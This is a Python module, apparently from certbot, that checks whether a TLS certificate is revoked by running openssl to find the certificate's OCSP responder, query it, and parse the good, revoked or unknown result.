"""Tools for checking certificate revocation.""" import logging import re from subprocess import Popen, PIPE from certbot import errors from certbot import util logger = logging.getLogger(__name__) class RevocationChecker(object): "This class figures out OCSP checking on this system, and performs it." def __init__(self): self.broken = False if not util.exe_exists("openssl"): logger.info("openssl not installed, can't check revocation") self.broken = True return # New versions of openssl want -header var=val, old ones want -header var val test_host_format = Popen(["openssl", "ocsp", "-header", "var", "val"], stdout=PIPE, stderr=PIPE, universal_newlines=True) _out, err = test_host_format.communicate() if "Missing =" in err: self.host_args = lambda host: ["Host=" + host] else: self.host_args = lambda host: ["Host", host] def ocsp_revoked(self, cert_path, chain_path): """Get revoked status for a particular cert version. .. todo:: Make this a non-blocking call :param str cert_path: Path to certificate :param str chain_path: Path to intermediate cert :rtype bool or None: :returns: True if revoked; False if valid or the check failed """ if self.broken: return False url, host = self.determine_ocsp_server(cert_path) if not host: return False # jdkasten thanks "Bulletproof SSL and TLS - Ivan Ristic" for documenting this! cmd = ["openssl", "ocsp", "-no_nonce", "-issuer", chain_path, "-cert", cert_path, "-url", url, "-CAfile", chain_path, "-verify_other", chain_path, "-trust_other", "-header"] + self.host_args(host) logger.debug("Querying OCSP for %s", cert_path) logger.debug(" ".join(cmd)) try: output, err = util.run_script(cmd, log=logger.debug) except errors.SubprocessError: logger.info("OCSP check failed for %s (are we offline?)", cert_path) return False return _translate_ocsp_query(cert_path, output, err) def determine_ocsp_server(self, cert_path): """Extract the OCSP server host from a certificate. 
:param str cert_path: Path to the cert we're checking OCSP for :rtype tuple: :returns: (OCSP server URL or None, OCSP server host or None) """ try: url, _err = util.run_script( ["openssl", "x509", "-in", cert_path, "-noout", "-ocsp_uri"], log=logger.debug) except errors.SubprocessError: logger.info("Cannot extract OCSP URI from %s", cert_path) return None, None url = url.rstrip() host = url.partition("://")[2].rstrip("/") if host: return url, host else: logger.info("Cannot process OCSP host from URL (%s) in cert at %s", url, cert_path) return None, None def _translate_ocsp_query(cert_path, ocsp_output, ocsp_errors): """Parse openssl's weird output to work out what it means.""" states = ("good", "revoked", "unknown") patterns = [r"{0}: (WARNING.*)?{1}".format(cert_path, s) for s in states] good, revoked, unknown = (re.search(p, ocsp_output, flags=re.DOTALL) for p in patterns) warning = good.group(1) if good else None if (not "Response verify OK" in ocsp_errors) or (good and warning) or unknown: logger.info("Revocation status for %s is unknown", cert_path) logger.debug("Uncertain output:\n%s\nstderr:\n%s", ocsp_output, ocsp_errors) return False elif good and not warning: return False elif revoked: warning = revoked.group(1) if warning: logger.info("OCSP revocation warning: %s", warning) return True else: logger.warn("Unable to properly parse OCSP output: %s\nstderr:%s", ocsp_output, ocsp_errors) return False